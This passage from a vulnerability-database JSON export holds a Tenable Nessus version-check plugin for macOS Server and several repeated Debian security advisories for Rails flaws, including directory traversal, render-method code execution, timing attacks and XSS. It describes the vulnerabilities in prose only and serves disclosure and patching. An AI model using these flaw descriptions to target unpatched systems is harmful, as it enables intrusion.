(deb_check(release:\"7.0\", prefix:\"ruby-activesupport-3.2\", reference:\"3.2.6-6+deb7u2\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:deb_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2023-03-01T14:25:16", "description": "The version of macOS Server (formerly known as Mac OS X Server) installed on the remote host is prior to 5.3. It is, therefore, affected by the following vulnerabilities :\n\n - A denial of service vulnerability exists in the Apache HTTP server when handling a saturation of partial HTTP requests. An unauthenticated, remote attacker can exploit this to crash the daemon. (CVE-2007-6750)\n\n - A denial of service vulnerability exists in Action Pack in Ruby on Rails due to improper restrictions on the use of the MIME type cache when handling specially crafted HTTP accept headers. An unauthenticated, remote attacker can exploit this to cause the cache to grow indefinitely. (CVE-2016-0751)\n\n - An information disclosure vulnerability exists in the Wiki Server component due to improper checking of unspecified permissions. An unauthenticated, remote can exploit this to enumerate users. 
(CVE-2017-2382)", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2017-03-31T00:00:00", "type": "nessus", "title": "macOS : macOS Server < 5.3 Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2007-6750", "CVE-2016-0751", "CVE-2017-2382"], "modified": "2019-11-13T00:00:00", "cpe": ["cpe:/o:apple:os_x_server"], "id": "MACOS_SERVER_5_3.NASL", "href": "https://www.tenable.com/plugins/nessus/99128", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(99128);\n script_version(\"1.4\");\n script_cvs_date(\"Date: 2019/11/13\");\n\n script_cve_id(\"CVE-2007-6750\", \"CVE-2016-0751\", \"CVE-2017-2382\");\n script_bugtraq_id(21865, 81800, 97128);\n script_xref(name:\"APPLE-SA\", value:\"APPLE-SA-2017-03-27-7\");\n\n script_name(english:\"macOS : macOS Server < 5.3 Multiple Vulnerabilities\");\n script_summary(english:\"Checks the macOS Server version.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host is missing a security update for macOS Server.\");\n script_set_attribute(attribute:\"description\", value:\n\"The 
version of macOS Server (formerly known as Mac OS X Server)\ninstalled on the remote host is prior to 5.3. It is, therefore,\naffected by the following vulnerabilities :\n\n - A denial of service vulnerability exists in the Apache\n HTTP server when handling a saturation of partial HTTP\n requests. An unauthenticated, remote attacker can\n exploit this to crash the daemon. (CVE-2007-6750)\n\n - A denial of service vulnerability exists in Action Pack\n in Ruby on Rails due to improper restrictions on the use\n of the MIME type cache when handling specially crafted\n HTTP accept headers. An unauthenticated, remote attacker\n can exploit this to cause the cache to grow\n indefinitely. (CVE-2016-0751)\n\n - An information disclosure vulnerability exists in the\n Wiki Server component due to improper checking of\n unspecified permissions. An unauthenticated, remote can\n exploit this to enumerate users. (CVE-2017-2382)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.apple.com/en-us/HT207604\");\n # https://lists.apple.com/archives/security-announce/2017/Mar/msg00008.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?e4736faa\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to macOS Server version 5.3 or later. 
Note that macOS Server\nversion 5.3 is available only for macOS 10.12.4 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-2382\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2007/01/03\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/03/27\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/03/31\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:apple:os_x_server\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"MacOS X Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"macosx_server_services.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/MacOSX/Version\", \"MacOSX/Server/Version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nos = get_kb_item(\"Host/MacOSX/Version\");\nif (!os) audit(AUDIT_OS_NOT, \"macOS\");\n\nversion = get_kb_item_or_exit(\"MacOSX/Server/Version\");\n\nfixed_version = \"5.3\";\nif (ver_compare(ver:version, fix:fixed_version, strict:FALSE) == -1)\n{\n security_report_v4(\n port:0,\n severity:SECURITY_WARNING,\n extra:\n '\\n Installed version : ' + version +\n '\\n Fixed version : ' + fixed_version +\n '\\n'\n );\n}\nelse audit(AUDIT_INST_VER_NOT_VULN, \"macOS Server\", version);\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}], "debian": [{"lastseen": "2021-10-23T21:55:51", "description": "Package : ruby-actionpack-3.2\nVersion : 3.2.6-6+deb7u3\nCVE ID : CVE-2015-7576 CVE-2016-0751 CVE-2016-0752 CVE-2016-2097 \n CVE-2016-2098 CVE-2016-6316\n\nMultiple vulnerabilities have been discovered in ruby-actionpack-3.2, a\nweb-flow and rendering framework and part of Rails:\n\nCVE-2015-7576\n\n A flaw was found in the way the Action Controller component compared\n user names and passwords when performing HTTP basic\n authentication. Time taken to compare strings could differ depending\n on input, possibly allowing a remote attacker to determine valid user\n names and passwords using a timing attack.\n\nCVE-2016-0751\n\n A flaw was found in the way the Action Pack component performed MIME\n type lookups. 
Since queries were cached in a global cache of MIME\n types, an attacker could use this flaw to grow the cache indefinitely,\n potentially resulting in a denial of service.\n\nCVE-2016-0752\n\n A directory traversal flaw was found in the way the Action View\n component searched for templates for rendering. If an application\n passed untrusted input to the 'render' method, a remote,\n unauthenticated attacker could use this flaw to render unexpected\n files and, possibly, execute arbitrary code.\n\nCVE-2016-2097\n\n Crafted requests to Action View might result in rendering files from\n arbitrary locations, including files beyond the application's view\n directory. This vulnerability is the result of an incomplete fix of\n CVE-2016-0752. This bug was found by Jyoti Singh and Tobias Kraze\n from Makandra.\n\nCVE-2016-2098\n\n If a web applications does not properly sanitize user inputs, an\n attacker might control the arguments of the render method in a\n controller or a view, resulting in the possibility of executing\n arbitrary ruby code. This bug was found by Tobias Kraze from\n Makandra and joernchen of Phenoelit.\n\nCVE-2016-6316\n\n Andrew Carpenter of Critical Juncture discovered a cross-site\n scripting vulnerability affecting Action View. 
Text declared as "HTML\n safe" will not have quotes escaped when used as attribute values in\n tag helpers.\n\nFor Debian 7 "Wheezy", these problems have been fixed in version\n3.2.6-6+deb7u3.\n\nWe recommend that you upgrade your ruby-actionpack-3.2 packages.\n\nFurther information about Debian LTS security advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://wiki.debian.org/LTS", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.6}, "published": "2016-08-28T18:14:37", "type": "debian", "title": "[SECURITY] [DLA 604-1] ruby-actionpack-3.2 security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-7576", "CVE-2016-0751", "CVE-2016-0752", "CVE-2016-2097", "CVE-2016-2098", "CVE-2016-6316"], "modified": "2016-08-28T18:14:37", "id": "DEBIAN:DLA-604-1:2A425", "href": "https://lists.debian.org/debian-lts-announce/2016/08/msg00028.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-10-21T22:30:30", "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-3509-1 security@debian.org\nhttps://www.debian.org/security/ 
Luciano Bello\nMarch 09, 2016 https://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : rails\nCVE ID : CVE-2016-2097 CVE-2016-2098\n\nTwo vulnerabilities have been discovered in Rails, a web application\nframework written in Ruby. Both vulnerabilities affect Action Pack, which\nhandles the web requests for Rails.\n\nCVE-2016-2097\n\n Crafted requests to Action View, one of the components of Action Pack,\n might result in rendering files from arbitrary locations, including\n files beyond the application's view directory. This vulnerability is\n the result of an incomplete fix of CVE-2016-0752.\n This bug was found by Jyoti Singh and Tobias Kraze from Makandra.\n\nCVE-2016-2098\n\n If a web applications does not properly sanitize user inputs, an\n attacker might control the arguments of the render method in a\n controller or a view, resulting in the possibility of executing\n arbitrary ruby code.\n This bug was found by Tobias Kraze from Makandra and joernchen of\n Phenoelit.\n\nFor the stable distribution (jessie), these problems have been fixed in\nversion 2:4.1.8-1+deb8u2.\n\nFor the testing distribution (stretch), these problems have been fixed\nin version 2:4.2.5.2-1.\n\nFor the unstable distribution (sid), these problems have been fixed in\nversion 2:4.2.5.2-1.\n\nWe recommend that you upgrade your rails packages.\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": 
"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.6}, "published": "2016-03-09T17:48:46", "type": "debian", "title": "[SECURITY] [DSA 3509-1] rails security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-0752", "CVE-2016-2097", "CVE-2016-2098"], "modified": "2016-03-09T17:48:46", "id": "DEBIAN:DSA-3509-1:A094D", "href": "https://lists.debian.org/debian-security-announce/2016/msg00082.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-02-24T12:23:28", "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-3509-1 security@debian.org\nhttps://www.debian.org/security/ Luciano Bello\nMarch 09, 2016 https://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : rails\nCVE ID : CVE-2016-2097 CVE-2016-2098\n\nTwo vulnerabilities have been discovered in Rails, a web application\nframework written in Ruby. Both vulnerabilities affect Action Pack, which\nhandles the web requests for Rails.\n\nCVE-2016-2097\n\n Crafted requests to Action View, one of the components of Action Pack,\n might result in rendering files from arbitrary locations, including\n files beyond the application's view directory. 
This vulnerability is\n the result of an incomplete fix of CVE-2016-0752.\n This bug was found by Jyoti Singh and Tobias Kraze from Makandra.\n\nCVE-2016-2098\n\n If a web applications does not properly sanitize user inputs, an\n attacker might control the arguments of the render method in a\n controller or a view, resulting in the possibility of executing\n arbitrary ruby code.\n This bug was found by Tobias Kraze from Makandra and joernchen of\n Phenoelit.\n\nFor the stable distribution (jessie), these problems have been fixed in\nversion 2:4.1.8-1+deb8u2.\n\nFor the testing distribution (stretch), these problems have been fixed\nin version 2:4.2.5.2-1.\n\nFor the unstable distribution (sid), these problems have been fixed in\nversion 2:4.2.5.2-1.\n\nWe recommend that you upgrade your rails packages.\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2016-03-09T17:13:24", "type": "debian", "title": "[SECURITY] [DSA 3509-1] rails security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": 
"NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-0752", "CVE-2016-2097", "CVE-2016-2098"], "modified": "2016-03-09T17:13:24", "id": "DEBIAN:DSA-3509-1:F9416", "href": "https://lists.debian.org/debian-security-announce/2016/msg00081.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-02-24T12:23:12", "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-3509-1 security@debian.org\nhttps://www.debian.org/security/ Luciano Bello\nMarch 09, 2016 https://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : rails\nCVE ID : CVE-2016-2097 CVE-2016-2098\n\nTwo vulnerabilities have been discovered in Rails, a web application\nframework written in Ruby. Both vulnerabilities affect Action Pack, which\nhandles the web requests for Rails.\n\nCVE-2016-2097\n\n Crafted requests to Action View, one of the components of Action Pack,\n might result in rendering files from arbitrary locations, including\n files beyond the application's view directory. 
This vulnerability is\n the result of an incomplete fix of CVE-2016-0752.\n This bug was found by Jyoti Singh and Tobias Kraze from Makandra.\n\nCVE-2016-2098\n\n If a web applications does not properly sanitize user inputs, an\n attacker might control the arguments of the render method in a\n controller or a view, resulting in the possibility of executing\n arbitrary ruby code.\n This bug was found by Tobias Kraze from Makandra and joernchen of\n Phenoelit.\n\nFor the stable distribution (jessie), these problems have been fixed in\nversion 2:4.1.8-1+deb8u2.\n\nFor the testing distribution (stretch), these problems have been fixed\nin version 2:4.2.5.2-1.\n\nFor the unstable distribution (sid), these problems have been fixed in\nversion 2:4.2.5.2-1.\n\nWe recommend that you upgrade your rails packages.\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2016-03-09T17:36:11", "type": "debian", "title": "[SECURITY] [DSA 3509-1] rails security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": 
"NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-0752", "CVE-2016-2097", "CVE-2016-2098"], "modified": "2016-03-09T17:36:11", "id": "DEBIAN:DSA-3509-1:F91B9", "href": "https://lists.debian.org/debian-security-announce/2016/msg00083.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-02-24T12:23:10", "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-3509-1 security@debian.org\nhttps://www.debian.org/security/ Luciano Bello\nMarch 09, 2016 https://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : rails\nCVE ID : CVE-2016-2097 CVE-2016-2098\n\nTwo vulnerabilities have been discovered in Rails, a web application\nframework written in Ruby. Both vulnerabilities affect Action Pack, which\nhandles the web requests for Rails.\n\nCVE-2016-2097\n\n Crafted requests to Action View, one of the components of Action Pack,\n might result in rendering files from arbitrary locations, including\n files beyond the application's view directory. 
This vulnerability is\n the result of an incomplete fix of CVE-2016-0752.\n This bug was found by Jyoti Singh and Tobias Kraze from Makandra.\n\nCVE-2016-2098\n\n If a web applications does not properly sanitize user inputs, an\n attacker might control the arguments of the render method in a\n controller or a view, resulting in the possibility of executing\n arbitrary ruby code.\n This bug was found by Tobias Kraze from Makandra and joernchen of\n Phenoelit.\n\nFor the stable distribution (jessie), these problems have been fixed in\nversion 2:4.1.8-1+deb8u2.\n\nFor the testing distribution (stretch), these problems have been fixed\nin version 2:4.2.5.2-1.\n\nFor the unstable distribution (sid), these problems have been fixed in\nversion 2:4.2.5.2-1.\n\nWe recommend that you upgrade your rails packages.\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2016-03-09T17:48:46", "type": "debian", "title": "[SECURITY] [DSA 3509-1] rails security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": 
"NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-0752", "CVE-2016-2097", "CVE-2016-2098"], "modified": "2016-03-09T17:48:46", "id": "DEBIAN:DSA-3509-1:D7374", "href": "https://lists.debian.org/debian-security-announce/2016/msg00082.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-02-24T12:30:28", "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-3464-1 security@debian.org\nhttps://www.debian.org/security/ Moritz Muehlenhoff\nJanuary 31, 2016 https://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : rails\nCVE ID : CVE-2015-3226 CVE-2015-3227 CVE-2015-7576 CVE-2015-7577 \n CVE-2015-7581 CVE-2016-0751 CVE-2016-0752 CVE-2016-0753\n\nMultiple security issues have been discovered in the Rails on Rails web\napplication development framework, which may result in denial of service,\ncross-site scripting, information disclosure or bypass of input\nvalidation.\n\nFor the stable distribution (jessie), these problems have been fixed in\nversion 2:4.1.8-1+deb8u1.\n\nFor the unstable distribution (sid), these problems have been fixed in\nversion 2:4.2.5.1-1.\n\nWe recommend that you upgrade your rails packages.\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, 
"published": "2016-01-31T18:43:51", "type": "debian", "title": "[SECURITY] [DSA 3464-1] rails security update", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-3226", "CVE-2015-3227", "CVE-2015-7576", "CVE-2015-7577", "CVE-2015-7581", "CVE-2016-0751", "CVE-2016-0752", "CVE-2016-0753"], "modified": "2016-01-31T18:43:51", "id": "DEBIAN:DSA-3464-1:09CC2", "href": "https://lists.debian.org/debian-security-announce/2016/msg00034.html", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2021-10-21T22:25:16", "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-3651-1 security@debian.org\nhttps://www.debian.org/security/ Salvatore Bonaccorso\nAugust 25, 2016 https://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : rails\nCVE ID : CVE-2016-6316\nDebian Bug : 834155\n\nAndrew Carpenter of Critical Juncture discovered a cross-site scripting\nvulnerability affecting Action View in rails, a web application\nframework written in Ruby. 
Text declared as "HTML safe" will not have\nquotes escaped when used as attribute values in tag helpers.\n\nFor the stable distribution (jessie), this problem has been fixed in\nversion 2:4.1.8-1+deb8u4.\n\nFor the unstable distribution (sid), this problem has been fixed in\nversion 2:4.2.7.1-1.\n\nWe recommend that you upgrade your rails packages.\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "baseScore": 6.1, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 2.7}, "published": "2016-08-25T16:20:10", "type": "debian", "title": "[SECURITY] [DSA 3651-1] rails security update", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-6316"], "modified": "2016-08-25T16:20:10", "id": "DEBIAN:DSA-3651-1:9DFD3", "href": "https://lists.debian.org/debian-security-announce/2016/msg00229.html", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2023-02-24T12:13:17", "description": "- 
-------------------------------------------------------------------------\nDebian Security Advisory DSA-3651-1 security@debian.org\nhttps://www.debian.org/security/ Salvatore Bonaccorso\nAugust 25, 2016 https://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : rails\nCVE ID : CVE-2016-6316\nDebian Bug : 834155\n\nAndrew Carpenter of Critical Juncture discovered a cross-site scripting\nvulnerability affecting Action View in rails, a web application\nframework written in Ruby. Text declared as "HTML safe" will not have\nquotes escaped when used as attribute values in tag helpers.\n\nFor the stable distribution (jessie), this problem has been fixed in\nversion 2:4.1.8-1+deb8u4.\n\nFor the unstable distribution (sid), this problem has been fixed in\nversion 2:4.2.7.1-1.\n\nWe recommend that you upgrade your rails packages.\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 6.1, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 2.7}, "published": "2016-08-25T16:20:10", "type": "debian", "title": "[SECURITY] [DSA 3651-1] rails security update", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 
4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-6316"], "modified": "2016-08-25T16:20:10", "id": "DEBIAN:DSA-3651-1:ADB0B", "href": "https://lists.debian.org/debian-security-announce/2016/msg00229.html", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2021-12-09T04:57:37", "description": "Package : ruby-activesupport-3.2\nVersion : 3.2.6-6+deb7u2\nCVE ID : CVE-2015-3227\n\nThe support and utility classes used by the Rails 3.2 framework allow\nremote attackers to cause a denial of service (SystemStackError) via a\nlarge XML document depth.\n\nFor Debian 7 "Wheezy", these problems have been fixed in version\n3.2.6-6+deb7u2.\n\nAdditionally this upload adds 'active_support/security_utils' that will\nbe used by ruby-actionpack-3.2 to address CVE-2015-7576.\n\nWe recommend that you upgrade your ruby-activesupport-3.2 packages.\n\nFurther information about Debian LTS security advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://wiki.debian.org/LTS", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "LOW", "confidentialityImpact": "LOW", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 3.7, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 1.4}, "published": "2016-08-27T16:25:23", "type": "debian", "title": "[SECURITY] [DLA 603-1] ruby-activesupport-3.2 security update", 